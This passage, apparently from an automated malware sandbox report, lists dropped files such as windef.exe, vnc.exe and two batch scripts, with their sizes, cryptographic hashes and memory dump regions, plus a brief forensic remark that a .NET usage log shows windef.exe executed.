    SHA512  7e5fd90fffae723bd0c662a90e0730b507805f072771ee673d1d8c262dbf60c8a03ba5fe088f699a97c2e886380de158b2ccd59ee62e3d012dd6dd14ea9d0e50
    The .NET CLR writes a CLR_v4.0_32\UsageLogs\<image>.exe.log entry when a 32-bit managed executable of that name runs, so this file is evidence that the dropped windef.exe executed as a .NET binary.
• C:\Users\Admin\AppData\Local\Temp\4nTpIhOebLIU.bat  (208B)
    MD5     e6a2a704c2be4772a6eeb272a3ed7ef8
    SHA1    cc2c4d76821fe14a2aab0b209d64c67f74e30e6d
    SHA256  3972a3e8cfe0c149a7a933f75e395f8733bbe40169ccdfd9bbace321f0323dc7
    SHA512  47127032ebb9fb9194d2a5656eedf9d6bdfe9b1153e5621d42d4f1e471800badba19f0bf2bc02501057074eee37ebf4c4cf8e27b1584fbcf55bec214dc65334a
• C:\Users\Admin\AppData\Local\Temp\JyfJAnc31als.bat  (208B)
    MD5     c93ba5136835ed7472f2c306b99693d8
    SHA1    15d5fe3de1d3aa40b0e7d4249b2074e759701c90
    SHA256  675ecc5f0ab59acf6aa22f1b532a994a2b93158d6975283cbe8f5d1460c31288
    SHA512  0de5825c4a84f86b5fe85ae8e19c418b973fe387e6857f4c2396bed81479f7e22112d499caaeeeb350b939ba9a666e2e28bebac9aaceb127a25f5b740eaf0735
• C:\Users\Admin\AppData\Local\Temp\vnc.exe  (405KB)
    MD5     b8ba87ee4c3fc085a2fed0d839aadce1
    SHA1    b3a2e3256406330e8b1779199bb2b9865122d766
    SHA256  4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4
    SHA512  7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2
• C:\Users\Admin\AppData\Local\Temp\windef.exe  (349KB)
    MD5     b4a202e03d4135484d0e730173abcc72
    SHA1    01b30014545ea526c15a60931d676f9392ea0c70
    SHA256  7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9
    SHA512  632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb
• C:\Users\Admin\AppData\Roaming\Logs\01-10-2025  (224B)
    MD5     97ff40dd3dd21486140519a735a53cf6
    SHA1    b2988e1eb94cfbd23f1528952ec8cc5637b320ea
    SHA256  ea251c3a701bba984565befd09c8c02011f728aa9ac7b198f86061fb2c355f99
    SHA512  5a8627aba01d1c1afd4dec4d6c9a2c34d5c84b6cfab01867087c9239094f079f20e2b08e99ce1d853c39c5a0ee05072e8b97f71495561266a522218f1ca9d0ce
• C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe  (2.0MB)
    MD5     872aa9ce13088039b7cba9dfbb063b33
    SHA1    342e9dd327e9a40d299e2b2e7c22a8b4dff92622
    SHA256  8b98bab071c85ac2cf68055075fbfb388cb3ba49b22704cbf71ca4b8cf87490b
    SHA512  b955e0f72f85727363ebbfcf2572627cdd1a96bb56570679f6acdf3f45e51dae65b0ecf2d6e399bc5f316773af18f62621895204f9da22e9f6aba86420935fa2
• memory/1896-80-0x0000000000EE0000-0x0000000000F00000-memory.dmp  (128KB)
• memory/1896-74-0x0000000000EE0000-0x0000000000F00000-memory.dmp  (128KB)
• memory/2276-19-0x0000000001470000-0x0000000001471000-memory.dmp  (4KB)
• memory/2868-45-0x0000000006560000-0x000000000656A000-memory.dmp  (40KB)
• memory/3800-28-0x0000000000A00000-0x0000000000A20000-memory.dmp  (128KB)
• memory/3800-20-0x0000000000A00000-0x0000000000A20000-memory.dmp  (128KB)
• memory/3952-37-0x0000000005BA0000-0x0000000005BDC000-memory.dmp  (240KB)
• memory/3952-36-0x0000000004EA0000-0x0000000004EB2000-memory.dmp  (72KB)
• memory/3952-35-0x0000000004990000-0x00000000049F6000-memory.dmp  (408KB)
• memory/3952-34-0x0000000004A50000-0x0000000004AE2000-memory.dmp  (584KB)
• memory/3952-33-0x0000000004ED0000-0x0000000005474000-memory.dmp  (5.6MB)
• memory/3952-32-0x0000000000020000-0x000000000007E000-memory.dmp  (376KB)
• memory/3952-29-0x00000000730EE000-0x00000000730EF000-memory.dmp  (4KB)
